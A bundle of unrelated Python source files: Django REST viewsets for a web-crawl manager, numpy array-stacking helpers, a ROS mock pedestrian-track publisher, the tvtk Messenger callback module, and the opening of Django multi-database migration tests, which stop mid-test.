        if value.name != "pageclassifier.features":
            raise serializers.ValidationError("File must be named pageclassifier.features")
        return value

    class Meta:
        model = CrawlModel
class SeedsListSerializer(SlugModelSerializer):
    url = serializers.CharField(read_only=True)
    file_string = serializers.CharField(read_only=True)

    def validate_seeds(self, value):
        """Require seeds to be a JSON-encoded array of valid URLs."""
        try:
            seeds = json.loads(value)
        except ValueError:
            raise serializers.ValidationError("Seeds must be a JSON encoded string.")
        if type(seeds) != list:
            raise serializers.ValidationError("Seeds must be an array of URLs.")
        validator = URLValidator()
        errors = []
        for index, x in enumerate(seeds):
            try:
                validator(x)
            except ValidationError:
                # Add index to make it easier for CodeMirror to select the right
                # line.
                errors.append({index: x})
        if errors:
            # Prepend a summary and append the full list for the client UI.
            errors.insert(0, "The seeds list contains invalid urls.")
            errors.append({"list": "\n".join(seeds)})
            raise serializers.ValidationError(errors)
        return value

    class Meta:
        model = SeedsList
"""
Viewset Classes.
Filtering is provided by django-filter.
Backend settings are in common_settings.py under REST_FRAMEWORK. Setting is:
'DEFAULT_FILTER_BACKENDS': ('rest_framework.filters.DjangoFilterBackend',)
This backend is supplied to every viewset by default. Alter query fields by adding
or removing items from filter_fields
"""
# CRUD endpoint for projects; query-string filtering on the listed fields.
class ProjectViewSet(viewsets.ModelViewSet):
    queryset = Project.objects.all()
    serializer_class = ProjectSerializer
    filter_fields = ('id', 'slug', 'name',)
# CRUD endpoint for crawls; query-string filtering on the listed fields.
class CrawlViewSet(viewsets.ModelViewSet):
    queryset = Crawl.objects.all()
    serializer_class = CrawlSerializer
    filter_fields = ('id', 'slug', 'name', 'description', 'status', 'project',
                     'crawl_model', 'crawler', 'seeds_object')
class CrawlModelViewSet(viewsets.ModelViewSet):
    queryset = CrawlModel.objects.all()
    serializer_class = CrawlModelSerializer
    filter_fields = ('id', 'slug', 'name', 'project',)

    def destroy(self, request, pk=None):
        """Delete a crawl model unless a crawl still references it.

        Also removes the model's files from disk before deleting the row.
        """
        model = CrawlModel.objects.get(pk=pk)
        crawls = Crawl.objects.all().filter(crawl_model=pk)
        if crawls:
            message = "The Crawl Model is being used by the following Crawls and cannot be deleted: "
            raise serializers.ValidationError({
                "message": message,
                "errors": [x.name for x in crawls],
            })
        else:
            # Remove the on-disk model directory first, then the DB row.
            shutil.rmtree(model.get_model_path())
            return super(CrawlModelViewSet, self).destroy(request)
class SeedsListViewSet(viewsets.ModelViewSet):
    queryset = SeedsList.objects.all()
    serializer_class = SeedsListSerializer
    filter_fields = ('id', 'name', 'seeds', 'slug',)

    def create(self, request):
        """Normalize uploaded-file or textarea seeds into a JSON string.

        NOTE(review): this is Python 2 code -- ``unicode`` and
        ``json.dumps(map(...))`` both break on Python 3 (map objects are not
        JSON-serializable); wrap with list() if the project is ported.
        """
        # If a seeds file or a textseeds exists, then use those. Otherwise, look
        # for a string in request.data["seeds"]
        seeds_list = request.FILES.get("seeds", False)
        textseeds = request.data.get("textseeds", False)
        if seeds_list:
            request.data["seeds"] = json.dumps(map(str.strip, seeds_list.readlines()))
        elif textseeds:
            if type(textseeds) == unicode:
                request.data["seeds"] = json.dumps(map(unicode.strip, textseeds.split("\n")))
            # Get rid of carriage return character.
            elif type(textseeds) == str:
                request.data["seeds"] = json.dumps(map(str.strip, textseeds.split("\n")))
        return super(SeedsListViewSet, self).create(request)

    def destroy(self, request, pk=None):
        """Delete a seeds list unless a crawl still references it."""
        seeds = SeedsList.objects.get(pk=pk)
        crawls = Crawl.objects.all().filter(seeds_object=pk)
        if crawls:
            message = "The Seeds List is being used by the following Crawls and cannot be deleted: "
            raise serializers.ValidationError({
                "message": message,
                "errors": [x.name for x in crawls],
            })
        else:
            return super(SeedsListViewSet, self).destroy(request)
class DataWakeView(APIView):
    """Read-only endpoint that aggregates DataWake trails from elasticsearch."""

    index = "datawake"
    es = Elasticsearch()

    def create_trails(self, trail_ids):
        """Build, for each trail id, its URL list and joined URL string."""
        trails = []
        for x in trail_ids:
            url_search = self.es.search(index=self.index, q="trail_id:%d" % x,
                                        fields="url", size=1000)["hits"]["hits"]
            # The ES document _type carries the trail's domain name here.
            new_trail = {"trail_id": x, "urls": [], "domain_name": url_search[0]["_type"]}
            for y in url_search:
                new_trail["urls"].append(y["fields"]["url"][0])
            new_trail.update({"urls_string": "\n".join(new_trail["urls"])})
            trails.append(new_trail)
        return trails

    def get(self, request, format=None):
        # TODO: catch all exception. At the very least, deal with 404 not found and
        # connection refused exceptions.
        # Temporarily remove exceptions for debugging.
        try:
            # Distinct trail ids via a terms aggregation, then expand each.
            trail_ids = [x["key"] for x in self.es.search(index=self.index, body={
                "aggs": {
                    "trail_id": {
                        "terms": {"field": "trail_id"}
                    }
                }
            })["aggregations"]["trail_id"]["buckets"]]
            response = self.create_trails(trail_ids)
        except ConnectionError as e:
            raise OSError("Failed to connect to local elasticsearch instance.")
        except NotFoundError:
            # Index missing: mapped to a 404 by DataWakeIndexUnavailable.
            raise DataWakeIndexUnavailable
        return Response(response)
# Wire the viewsets onto a single DRF router; the urlconf includes router.urls.
router = routers.DefaultRouter()
router.register(r"projects", ProjectViewSet)
router.register(r"crawls", CrawlViewSet)
router.register(r"crawl_models", CrawlModelViewSet)
router.register(r"seeds_list", SeedsListViewSet)
|
from . import numeric as _nx
from .numeric import asanyarray, newaxis
def atleast_1d(*arys):
    """View the inputs as arrays with at least one dimension.

    Scalar (0-d) inputs are reshaped to shape ``(1,)``; anything already
    1-d or higher is passed through as an ``asanyarray`` view.

    Returns a single array when one argument is given, otherwise a list of
    arrays, one per argument.
    """
    res = []
    for ary in arys:
        ary = asanyarray(ary)
        # Idiom: ary.ndim instead of len(ary.shape).
        if ary.ndim == 0:
            result = ary.reshape(1)
        else:
            result = ary
        res.append(result)
    if len(res) == 1:
        return res[0]
    else:
        return res
def atleast_2d(*arys):
    """View the inputs as arrays with at least two dimensions.

    Scalars become ``(1, 1)`` arrays; 1-d arrays of length N are promoted to
    ``(1, N)`` row vectors; 2-d or higher inputs pass through unchanged.

    Returns a single array when one argument is given, otherwise a list of
    arrays, one per argument.
    """
    res = []
    for ary in arys:
        ary = asanyarray(ary)
        # Idiom: ary.ndim instead of len(ary.shape).
        if ary.ndim == 0:
            result = ary.reshape(1, 1)
        elif ary.ndim == 1:
            # Prepend a length-1 axis: shape (N,) -> (1, N).
            result = ary[newaxis, :]
        else:
            result = ary
        res.append(result)
    if len(res) == 1:
        return res[0]
    else:
        return res
def vstack(tup):
    """Stack the given arrays vertically (along the first axis), after
    promoting each to at least two dimensions."""
    rows = [atleast_2d(piece) for piece in tup]
    return _nx.concatenate(rows, 0)
def hstack(tup):
    """Stack the given arrays horizontally, after promoting each to at
    least one dimension."""
    arrs = [atleast_1d(piece) for piece in tup]
    # As a special case, dimension 0 of 1-dimensional arrays is "horizontal"
    axis = 0 if arrs[0].ndim == 1 else 1
    return _nx.concatenate(arrs, axis)
|
import rospy, yaml, tf
from spencer_tracking_msgs.msg import TrackedPersons, TrackedPerson
from nav_msgs.msg import GridCells
from math import cos, sin, tan, pi, radians
def createTrackedPerson(track_id, x, y, theta):
    """Build a TrackedPerson at (x, y) heading ``theta`` degrees.

    The input angle is rotated by +90 degrees so that 0 means "along +y";
    the unit twist vector points in the resulting heading.
    """
    trackedPerson = TrackedPerson()

    # Convert degrees to radians and shift into the ROS yaw convention.
    theta = radians(theta) + pi/2.0

    trackedPerson.track_id = track_id
    quaternion = tf.transformations.quaternion_from_euler(0, 0, theta)

    trackedPerson.pose.pose.position.x = x
    trackedPerson.pose.pose.position.y = y

    trackedPerson.pose.pose.orientation.x = quaternion[0]
    trackedPerson.pose.pose.orientation.y = quaternion[1]
    trackedPerson.pose.pose.orientation.z = quaternion[2]
    trackedPerson.pose.pose.orientation.w = quaternion[3]

    # 6x6 row-major covariance: tight in x/y, effectively unknown elsewhere.
    trackedPerson.pose.covariance[0 + 0 * 6] = 0.001  # x
    trackedPerson.pose.covariance[1 + 1 * 6] = 0.001  # y
    trackedPerson.pose.covariance[2 + 2 * 6] = 999999  # z
    trackedPerson.pose.covariance[3 + 3 * 6] = 999999  # x rotation
    # Bug fix: both rotation entries below wrote the off-diagonal [4 + 5*6],
    # leaving the y-rotation diagonal [4 + 4*6] unset; use the diagonals.
    trackedPerson.pose.covariance[4 + 4 * 6] = 999999  # y rotation
    trackedPerson.pose.covariance[5 + 5 * 6] = 999999  # z rotation

    # Unit-speed velocity along the heading.
    trackedPerson.twist.twist.linear.x = cos(theta)
    trackedPerson.twist.twist.linear.y = sin(theta)

    for i in range(0, 3):
        trackedPerson.twist.covariance[i + i * 6] = 1.0  # linear velocity
    for i in range(3, 6):
        trackedPerson.twist.covariance[i + i * 6] = float("inf")  # rotational velocity

    return trackedPerson
def main():
    """Publish a fixed crowd of mock TrackedPersons at 10 Hz until shutdown."""
    trackPublisher = rospy.Publisher('/spencer/perception/tracked_persons', TrackedPersons )
    #obstaclesPublisher = rospy.Publisher('/pedsim/static_obstacles', GridCells )
    rospy.init_node( 'mock_tracked_persons' )
    rate = rospy.Rate(10)
    #obstacles = yaml.load(OBSTACLE_YAML)
    #obstacles = [ d for d in obstacles]
    seqCounter = 0
    while not rospy.is_shutdown():
        trackedPersons = TrackedPersons()
        trackedPersons.header.seq = seqCounter
        trackedPersons.header.frame_id = "odom"
        trackedPersons.header.stamp = rospy.Time.now()
        # Static scenario: createTrackedPerson( trackId, x, y, theta ).
        # NOTE: ids 1-7 were written as 01..07 (Python 2 octal literals,
        # a SyntaxError on Python 3); same values, plain decimal now.
        trackedPersons.tracks.append( createTrackedPerson( 1, 5, 4, 90 ) )
        trackedPersons.tracks.append( createTrackedPerson( 2, 6, 5.45878, 90 ) )
        trackedPersons.tracks.append( createTrackedPerson( 3, 7.22, 5.70, 90 ) )
        trackedPersons.tracks.append( createTrackedPerson( 4, 2+7.22, 7.33, 90 ) )
        trackedPersons.tracks.append( createTrackedPerson( 5, 2+8.92, 8.42, 90 ) )
        trackedPersons.tracks.append( createTrackedPerson( 6, 2+7.92, 10.41, 90 ) )
        trackedPersons.tracks.append( createTrackedPerson( 7, 2+7.2, 9.44, 90 ) )
        trackedPersons.tracks.append( createTrackedPerson( 8, 2+7, 14-2, 90 ) )
        trackedPersons.tracks.append( createTrackedPerson( 9, 2+6, 15.4123-2, 90 ) )
        trackedPersons.tracks.append( createTrackedPerson( 10, 5-1, 18.595-5, 280 ) )
        trackedPersons.tracks.append( createTrackedPerson( 11, 5-1, 20-5, 270 ) )
        trackedPersons.tracks.append( createTrackedPerson( 12, 6-1, 21.5491-5, 240 ) )
        trackedPersons.tracks.append( createTrackedPerson( 13, 7.48044-1, 19-5, 90 ) )
        trackedPersons.tracks.append( createTrackedPerson( 14, 6, 24.5463, 45 ) )
        trackedPersons.tracks.append( createTrackedPerson( 15, 8, 28, 90 ) )
        trackedPersons.tracks.append( createTrackedPerson( 16, 10.4458, 23, 68 ) )
        trackedPersons.tracks.append( createTrackedPerson( 17, 11.5004, 27, 88 ) )
        trackedPersons.tracks.append( createTrackedPerson( 18, 14, 25.4389, 20 ) )
        trackedPersons.tracks.append( createTrackedPerson( 19, 15, 21, 90 ) )
        trackedPersons.tracks.append( createTrackedPerson( 20, 15, 22.4308, 92 ) )
        trackedPersons.tracks.append( createTrackedPerson( 21, 15.4676, 24, 91 ) )
        trackedPersons.tracks.append( createTrackedPerson( 22, 16.5423, 25.4178, 90 ) )
        trackedPersons.tracks.append( createTrackedPerson( 23, 18, 20, 90 ) )
        trackedPersons.tracks.append( createTrackedPerson( 24, 18.5532, 21.5011, 90 ) )
        trackedPersons.tracks.append( createTrackedPerson( 25, 15.4739, 16.5314, 45 ) )
        trackedPersons.tracks.append( createTrackedPerson( 26, 20, 25.5746, 90 ) )
        trackedPersons.tracks.append( createTrackedPerson( 27, 21.5327, 24, 90 ) )
        trackedPersons.tracks.append( createTrackedPerson( 28, 22, 26.4632, 90 ) )
        trackedPersons.tracks.append( createTrackedPerson( 29, 21, 18, 45 ) )
        trackedPersons.tracks.append( createTrackedPerson( 30, 23, 20.4335, 90 ) )
        trackedPersons.tracks.append( createTrackedPerson( 31, 23.4972, 21.4055, 90 ) )
        trackedPersons.tracks.append( createTrackedPerson( 32, 23.4025, 22.4749, 90 ) )
        trackedPersons.tracks.append( createTrackedPerson( 33, 24.5281, 18.5868, 54 ) )
        trackedPersons.tracks.append( createTrackedPerson( 34, 16.554, 3.40568-2, 94 ) )
        trackedPersons.tracks.append( createTrackedPerson( 35, 16, 6-1, 94 ) )
        trackedPersons.tracks.append( createTrackedPerson( 36, 20, 4, 0 ) )
        trackedPersons.tracks.append( createTrackedPerson( 37, 19, 12, 25 ) )
        trackedPersons.tracks.append( createTrackedPerson( 38, 23, 8, 50 ) )
        trackedPersons.tracks.append( createTrackedPerson( 39, 24, 10, 90 ) )
        trackedPersons.tracks.append( createTrackedPerson( 40, 25, 12, 120 ) )
        trackedPersons.tracks.append( createTrackedPerson( 41, 7.51, 22.41, 80 ) )
        trackedPersons.tracks.append( createTrackedPerson( 42, 8.21, 25.7, 81 ) )
        trackedPersons.tracks.append( createTrackedPerson( 43, 3.31, 27.7, 81 ) )
        trackedPersons.tracks.append( createTrackedPerson( 44, 11.421, 18.7, 75 ) )
        trackedPersons.tracks.append( createTrackedPerson( 45, 25.21, 27.0, 85 ) )
        trackedPersons.tracks.append( createTrackedPerson( 46, 18.23, 6.87, -91 ) )
        trackedPersons.tracks.append( createTrackedPerson( 47, 18.6, 8.90, -90 ) )
        trackedPersons.tracks.append( createTrackedPerson( 48, 20.4, 7.87, 85 ) )
        trackedPersons.tracks.append( createTrackedPerson( 49, 15.684, 10.74, 75 ) )
        trackedPersons.tracks.append( createTrackedPerson( 50, 15.72,14.51 , 70 ) )
        trackPublisher.publish( trackedPersons )
        #obstacles['header'] = trackedPersons.header
        #obstaclesPublisher.publish( obstacles )
        seqCounter += 1
        rate.sleep()
OBSTACLE_YAML= """
header:
seq: 48860
stamp:
secs: 0
nsecs: 0
frame_id: world
cell_width: 1.0
cell_height: 1.0
cells:
-
x: -0.5
y: -0.5
z: 0.0
-
x: 0.5
y: -0.5
z: 0.0
-
x: 1.5
y: -0.5
z: 0.0
-
x: 2.5
y: -0.5
z: 0.0
-
x: 3.5
y: -0.5
z: 0.0
-
x: 4.5
y: -0.5
z: 0.0
-
x: 5.5
y: -0.5
z: 0.0
-
x: 6.5
y: -0.5
z: 0.0
-
x: 7.5
y: -0.5
z: 0.0
-
x: 8.5
y: -0.5
z: 0.0
-
x: 9.5
y: -0.5
z: 0.0
-
x: 10.5
y: -0.5
z: 0.0
-
x: 11.5
y: -0.5
z: 0.0
-
x: 12.5
y: -0.5
z: 0.0
-
x: 13.5
y: -0.5
z: 0.0
-
x: 14.5
y: -0.5
z: 0.0
-
x: 15.5
y: -0.5
z: 0.0
-
x: 16.5
y: -0.5
z: 0.0
-
x: 17.5
y: -0.5
z: 0.0
-
x: 18.5
y: -0.5
z: 0.0
-
x: 19.5
y: -0.5
z: 0.0
-
x: 20.5
y: -0.5
z: 0.0
-
x: 21.5
y: -0.5
z: 0.0
-
x: 22.5
y: -0.5
z: 0.0
-
x: 23.5
y: -0.5
z: 0.0
-
x: 24.5
y: -0.5
z: 0.0
-
x: 25.5
y: -0.5
z: 0.0
-
x: 26.5
y: -0.5
z: 0.0
-
x: 27.5
y: -0.5
z: 0.0
-
x: -0.5
y: -0.5
z: 0.0
-
x: -0.5
y: 0.5
z: 0.0
-
x: -0.5
y: 1.5
z: 0.0
-
x: -0.5
y: 2.5
z: 0.0
-
x: -0.5
y: 3.5
z: 0.0
-
x: -0.5
y: 4.5
z: 0.0
-
x: -0.5
y: 5.5
z: 0.0
-
x: -0.5
y: 6.5
z: 0.0
-
x: -0.5
y: 7.5
z: 0.0
-
x: -0.5
y: 8.5
z: 0.0
-
x: -0.5
y: 9.5
z: 0.0
-
x: -0.5
y: 10.5
z: 0.0
-
x: -0.5
y: 11.5
z: 0.0
-
x: -0.5
y: 12.5
z: 0.0
-
x: -0.5
y: 13.5
z: 0.0
-
x: -0.5
y: 14.5
z: 0.0
-
x: -0.5
y: 15.5
z: 0.0
-
x: -0.5
y: 16.5
z: 0.0
-
x: -0.5
y: 17.5
z: 0.0
-
x: -0.5
y: 18.5
z: 0.0
-
x: -0.5
y: 19.5
z: 0.0
-
x: -0.5
y: 20.5
z: 0.0
-
x: -0.5
y: 21.5
z: 0.0
-
x: -0.5
y: 22.5
z: 0.0
-
x: -0.5
y: 23.5
z: 0.0
-
x: -0.5
y: 24.5
z: 0.0
-
x: -0.5
y: 25.5
z: 0.0
-
x: -0.5
y: 26.5
z: 0.0
-
x: -0.5
y: 27.5
z: 0.0
-
x: -0.5
y: 28.5
z: 0.0
-
x: -0.5
y: 29.5
z: 0.0
-
x: -0.5
y: 30.5
z: 0.0
-
x: -0.5
y: 31.5
z: 0.0
-
x: -0.5
y: 31.5
z: 0.0
-
x: 0.5
y: 31.5
z: 0.0
-
x: 1.5
y: 31.5
z: 0.0
-
x: 2.5
y: 31.5
z: 0.0
-
x: 3.5
y: 31.5
z: 0.0
-
x: 4.5
y: 31.5
z: 0.0
-
x: 5.5
y: 31.5
z: 0.0
-
x: 6.5
y: 31.5
z: 0.0
-
x: 7.5
y: 31.5
z: 0.0
-
x: 8.5
y: 31.5
z: 0.0
-
x: 9.5
y: 31.5
z: 0.0
-
x: 10.5
y: 31.5
z: 0.0
-
x: 11.5
y: 31.5
z: 0.0
-
x: 12.5
y: 31.5
z: 0.0
-
x: 13.5
y: 31.5
z: 0.0
-
x: 14.5
y: 31.5
z: 0.0
-
x: 15.5
y: 31.5
z: 0.0
-
x: 16.5
y: 31.5
z: 0.0
-
x: 17.5
y: 31.5
z: 0.0
-
x: 18.5
y: 31.5
z: 0.0
-
x: 19.5
y: 31.5
z: 0.0
-
x: 20.5
y: 31.5
z: 0.0
-
x: 21.5
y: 31.5
z: 0.0
-
x: 22.5
y: 31.5
z: 0.0
-
x: 23.5
y: 31.5
z: 0.0
-
x: 24.5
y: 31.5
z: 0.0
-
x: 25.5
y: 31.5
z: 0.0
-
x: 26.5
y: 31.5
z: 0.0
-
x: 27.5
y: 31.5
z: 0.0
-
x: 27.5
y: -0.5
z: 0.0
-
x: 27.5
y: 0.5
z: 0.0
-
x: 27.5
y: 1.5
z: 0.0
-
x: 27.5
y: 2.5
z: 0.0
-
x: 27.5
y: 3.5
z: 0.0
-
x: 27.5
y: 4.5
z: 0.0
-
x: 27.5
y: 5.5
z: 0.0
-
x: 27.5
y: 6.5
z: 0.0
-
x: 27.5
y: 7.5
z: 0.0
-
x: 27.5
y: 8.5
z: 0.0
-
x: 27.5
y: 9.5
z: 0.0
-
x: 27.5
y: 10.5
z: 0.0
-
x: 27.5
y: 11.5
z: 0.0
-
x: 27.5
y: 12.5
z: 0.0
-
x: 27.5
y: 13.5
z: 0.0
-
x: 27.5
y: 14.5
z: 0.0
-
x: 27.5
y: 15.5
z: 0.0
-
x: 27.5
y: 16.5
z: 0.0
-
x: 27.5
y: 17.5
z: 0.0
-
x: 27.5
y: 18.5
z: 0.0
-
x: 27.5
y: 19.5
z: 0.0
-
x: 27.5
y: 20.5
z: 0.0
-
x: 27.5
y: 21.5
z: 0.0
-
x: 27.5
y: 22.5
z: 0.0
-
x: 27.5
y: 23.5
z: 0.0
-
x: 27.5
y: 24.5
z: 0.0
-
x: 27.5
y: 25.5
z: 0.0
-
x: 27.5
y: 26.5
z: 0.0
-
x: 27.5
y: 27.5
z: 0.0
-
x: 27.5
y: 28.5
z: 0.0
-
x: 27.5
y: 29.5
z: 0.0
-
x: 27.5
y: 30.5
z: 0.0
-
x: 27.5
y: 31.5
z: 0.0
-
x: 26.5
y: 3.5
z: 0.0
-
x: 26.5
y: 4.5
z: 0.0
-
x: 26.5
y: 5.5
z: 0.0
-
x: 26.5
y: 6.5
z: 0.0
-
x: 26.5
y: 7.5
z: 0.0
-
x: 26.5
y: 9.5
z: 0.0
-
x: 26.5
y: 10.5
z: 0.0
-
x: 26.5
y: 11.5
z: 0.0
-
x: 26.5
y: 12.5
z: 0.0
-
x: 26.5
y: 13.5
z: 0.0
"""
# Script entry point: start the mock track publisher.
if __name__ == '__main__':
    main()
|
"""
Implements a simple, robust, safe, Messenger class that allows one to
register callbacks for a signal/slot (or event/handler) kind of
messaging system. One can basically register a callback
function/method to be called when an object sends a particular event.
The Messenger class is Borg. So it is easy to instantiate and use.
This module is also reload-safe, so if the module is reloaded the
callback information is not lost. Method callbacks do not have a
reference counting problem since weak references are used.
The main functionality of this module is provided by three functions,
`connect`, `disconnect` and `send`.
Here is example usage with VTK::
>>> import messenger, vtk
>>> def cb(obj, evt):
... print obj.__class__.__name__, evt
...
>>> o = vtk.vtkProperty()
>>> o.AddObserver('ModifiedEvent', messenger.send)
1
>>> messenger.connect(o, 'ModifiedEvent', cb)
>>>
>>> o.SetRepresentation(1)
vtkOpenGLProperty ModifiedEvent
>>> messenger.connect(o, 'AnyEvent', cb)
>>> o.SetRepresentation(2)
vtkOpenGLProperty ModifiedEvent
vtkOpenGLProperty ModifiedEvent
>>>
>>> messenger.send(o, 'foo')
vtkOpenGLProperty foo
>>> messenger.disconnect(o, 'AnyEvent')
>>> messenger.send(o, 'foo')
>>>
This approach is necessary if you don't want to be bitten by reference
cycles. If you have a Python object holding a reference to a VTK
object and pass a method of the object to the AddObserver call, you
will get a reference cycle that cannot be collected by the garbage
collector. Using this messenger module gets around the problem.
Also note that adding a connection for 'AnyEvent' will trigger a
callback no matter what event was generated. The code above also
shows how disconnection works.
"""
__all__ = ['Messenger', 'MessengerError',
'connect', 'disconnect', 'send']
import types
import sys
import weakref
# Preserve callback registrations across module reloads: if a previous
# incarnation of this module is already imported, adopt its Borg state.
_saved = {}
for name in ['messenger', 'tvtk.messenger']:
    # 'name in sys.modules' replaces the Python-2-only dict.has_key().
    if name in sys.modules:
        mod = sys.modules[name]
        if hasattr(mod, 'Messenger'):
            _saved = mod.Messenger._shared_data
        del mod
        break
class MessengerError(Exception):
    """Raised for invalid callbacks and lookups of unregistered objects."""
    pass
class Messenger:
    """Implements a messenger class which deals with something like
    signals and slots. Basically, an object can register a signal
    that it plans to emit. Any other object can decide to handle that
    signal (of that particular object) by registering itself with the
    messenger. When a signal is emitted the messenger calls all
    handlers. This makes it totally easy to deal with communication
    between objects. The class is Borg. Rather than use this class,
    please use the 'connect' and 'disconnect' functions.
    """
    # Borg: every instance shares this dict (and therefore all state).
    _shared_data = _saved

    def __init__(self):
        """Create the messenger. This class is Borg. So all
        instances are the same.
        """
        self.__dict__ = self._shared_data
        if not hasattr(self, '_signals'):
            # First instantiation.
            self._signals = {}
            self._catch_all = ['AnyEvent', 'all']

    #################################################################
    # 'Messenger' interface.
    #################################################################
    def connect(self, obj, event, callback):
        """ Registers a slot given an object and its signal to slot
        into and also given a bound method in `callback` that should
        have two arguments. `send` will call the callback
        with the object that emitted the signal and the actual
        event/signal as arguments.
        Parameters
        ----------
        - obj : Python object
            Any Python object that will generate the particular event.
        - event : An event (can be anything, usually strings)
            The event `obj` will generate. If this is in the list
            `self._catch_all`, then any event will call this callback.
        - callback : `function` or `method`
            This callback will be called when the object generates the
            particular event. The object, event and any other arguments
            and keyword arguments given by the `obj` are passed along to
            the callback.
        """
        typ = type(callback)
        key = hash(obj)
        # 'in' replaces the Python-2-only dict.has_key(); works on 2 and 3.
        if key not in self._signals:
            self._signals[key] = {}
        signals = self._signals[key]
        if event not in signals:
            signals[event] = {}
        slots = signals[event]
        callback_key = hash(callback)
        if typ is types.FunctionType:
            # Plain functions are stored strongly; no weakref needed.
            slots[callback_key] = (None, callback)
        elif typ is types.MethodType:
            # Store a weak reference to the bound object plus the method
            # name to avoid keeping the object alive.  __self__ is the
            # portable spelling of the Python-2-only im_self attribute.
            obj = weakref.ref(callback.__self__)
            name = callback.__name__
            slots[callback_key] = (obj, name)
        else:
            # raise-as-call replaces the Python-2-only statement form.
            raise MessengerError(
                "Callback must be a function or method. "
                "You passed a %s." % (str(callback)))

    def disconnect(self, obj, event=None, callback=None, obj_is_hash=False):
        """Disconnects the object and its event handlers.
        Parameters
        ----------
        - obj : Object
            The object that generates events.
        - event : The event. (defaults to None)
        - callback : `function` or `method`
            The event handler.
        If `event` and `callback` are None (the default) all the
        events and handlers for the object are removed. If only
        `callback` is None, only this handler is removed. If `obj`
        and 'event' alone are specified, all handlers for the event
        are removed.
        - obj_is_hash : `bool`
            Specifies if the object passed is a hash instead of the object itself.
            This is needed if the object is gc'd but only the hash exists and one
            wants to disconnect the object.
        """
        signals = self._signals
        if obj_is_hash:
            key = obj
        else:
            key = hash(obj)
        if key not in signals:
            return
        if callback is None:
            if event is None:
                del signals[key]
            else:
                del signals[key][event]
        else:
            del signals[key][event][hash(callback)]

    def send(self, source, event, *args, **kw_args):
        """To be called by the object `source` that desires to
        generate a particular event. This function in turn invokes
        all the handlers for the event passing the `source` object,
        event and any additional arguments and keyword arguments. If
        any connected callback is garbage collected without being
        disconnected, it is silently removed from the existing slots.
        Parameters
        ----------
        - source : Python object
            This is the object that generated the event.
        - event : The event.
            If there are handlers connected to events called 'AnyEvent'
            or 'all', then any event will invoke these.
        """
        try:
            sigs = self._get_signals(source)
        except (MessengerError, KeyError):
            return
        events = self._catch_all[:]
        if event not in events:
            events.append(event)
        for evt in events:
            if evt in sigs:
                slots = sigs[evt]
                # Iterate over a copy of the keys so dead callbacks can be
                # pruned while looping (on Python 3, .keys() is a live view
                # and deleting during iteration raises RuntimeError).
                for key in list(slots):
                    obj, meth = slots[key]
                    if obj:  # instance method
                        inst = obj()
                        if inst:
                            getattr(inst, meth)(source, event, *args, **kw_args)
                        else:
                            # Oops, dead reference.
                            del slots[key]
                    else:  # normal function
                        meth(source, event, *args, **kw_args)

    def is_registered(self, obj):
        """Returns if the given object has registered itself with the
        messenger.
        """
        try:
            sigs = self._get_signals(obj)
        except MessengerError:
            return 0
        else:
            return 1

    def get_signal_names(self, obj):
        """Returns a list of signal names the object passed has
        registered.
        """
        return self._get_signals(obj).keys()

    #################################################################
    # Non-public interface.
    #################################################################
    def _get_signals(self, obj):
        """Given an object `obj` it returns the signals of that
        object.
        """
        ret = self._signals.get(hash(obj))
        if ret is None:
            raise MessengerError(
                "No such object: %s, has registered itself "
                "with the messenger." % obj)
        else:
            return ret
# Single module-level Borg instance backing the convenience functions below.
_messenger = Messenger()
def connect(obj, event, callback):
    # Thin module-level wrapper; see Messenger.connect (docstring copied below).
    _messenger.connect(obj, event, callback)
connect.__doc__ = _messenger.connect.__doc__
def disconnect(obj, event=None, callback=None, obj_is_hash=False):
    # Thin module-level wrapper; see Messenger.disconnect.
    # BUGFIX: obj_is_hash was accepted here but silently dropped; it is
    # now forwarded to the underlying Messenger instance.
    _messenger.disconnect(obj, event, callback, obj_is_hash)
disconnect.__doc__ = _messenger.disconnect.__doc__
def send(obj, event, *args, **kw_args):
    # Thin module-level wrapper; see Messenger.send (docstring copied below).
    _messenger.send(obj, event, *args, **kw_args)
send.__doc__ = _messenger.send.__doc__
del _saved
|
import unittest
from django.db import connection, migrations, models
from django.db.migrations.state import ProjectState
from django.test import override_settings
from .test_operations import OperationTestBase
try:
import sqlparse
except ImportError:
sqlparse = None
class AgnosticRouter(object):
    """Database router with no migration opinion: always defers."""

    def allow_migrate(self, db, model, **hints):
        # Returning None lets other routers (or the default) decide.
        return None
class MigrateNothingRouter(object):
    """Database router that vetoes every migration."""

    def allow_migrate(self, db, model, **hints):
        # Unconditional veto.
        return False
class MigrateEverythingRouter(object):
    """Database router that approves every migration."""

    def allow_migrate(self, db, model, **hints):
        # Unconditional approval.
        return True
class MigrateWhenFooRouter(object):
    """Database router whose decision is taken from the 'foo' hint."""

    def allow_migrate(self, db, model, **hints):
        # Echo the hint value itself (deliberately not coerced to bool);
        # without the hint, migrating is refused.
        if 'foo' in hints:
            return hints['foo']
        return False
class MultiDBOperationTests(OperationTestBase):
    # Run the test suite against every configured database connection.
    multi_db = True
    def _test_create_model(self, app_label, should_run):
        """
        Tests that CreateModel honours multi-db settings.
        """
        operation = migrations.CreateModel(
            "Pony",
            [("id", models.AutoField(primary_key=True))],
        )
        # Test the state alteration
        project_state = ProjectState()
        new_state = project_state.clone()
        operation.state_forwards(app_label, new_state)
        # Test the database alteration
        self.assertTableNotExists("%s_pony" % app_label)
        with connection.schema_editor() as editor:
            operation.database_forwards(app_label, editor, project_state, new_state)
        # Whether the table now exists depends on the active router.
        if should_run:
            self.assertTableExists("%s_pony" % app_label)
        else:
            self.assertTableNotExists("%s_pony" % app_label)
        # And test reversal
        with connection.schema_editor() as editor:
            operation.database_backwards(app_label, editor, new_state, project_state)
        self.assertTableNotExists("%s_pony" % app_label)
    @override_settings(DATABASE_ROUTERS=[AgnosticRouter()])
    def test_create_model(self):
        """
        Test when router doesn't have an opinion (i.e. CreateModel should run).
        """
        self._test_create_model("test_mltdb_crmo", should_run=True)
    @override_settings(DATABASE_ROUTERS=[MigrateNothingRouter()])
    def test_create_model2(self):
        """
        Test when router returns False (i.e. CreateModel shouldn't run).
        """
        self._test_create_model("test_mltdb_crmo2", should_run=False)
    @override_settings(DATABASE_ROUTERS=[MigrateEverythingRouter()])
    def test_create_model3(self):
        """
        Test when router returns True (i.e. CreateModel should run).
        """
        self._test_create_model("test_mltdb_crmo3", should_run=True)
    def test_create_model4(self):
        """
        Test multiple routers.
        """
        # The first router that expresses an opinion wins.
        with override_settings(DATABASE_ROUTERS=[AgnosticRouter(), AgnosticRouter()]):
            self._test_create_model("test_mltdb_crmo4", should_run=True)
        with override_settings(DATABASE_ROUTERS=[MigrateNothingRouter(), MigrateEverythingRouter()]):
